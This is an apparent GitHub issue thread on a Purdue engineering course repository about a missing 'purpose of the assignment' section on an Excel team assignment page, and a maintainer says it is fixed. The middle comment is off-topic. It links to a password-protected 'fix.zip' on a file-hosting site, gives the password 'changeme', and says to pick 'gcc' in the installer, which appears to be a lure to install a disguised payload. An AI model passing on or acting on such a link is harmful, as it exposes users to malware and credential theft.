### ISSUE TITLE
Issue on page MS Excel / 3.2. Team Assignments

### ISSUE THREAD

**Issue by brimeden** [Purdue-ENGR-13300/fall-2024#11]
The 3.2. Team Assignments is missing a "purpose of the assignment" This is the section directly above the deliverables table on the outline page of the team assignment for Excel 3.

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sdustker** [comment]
It should be available now
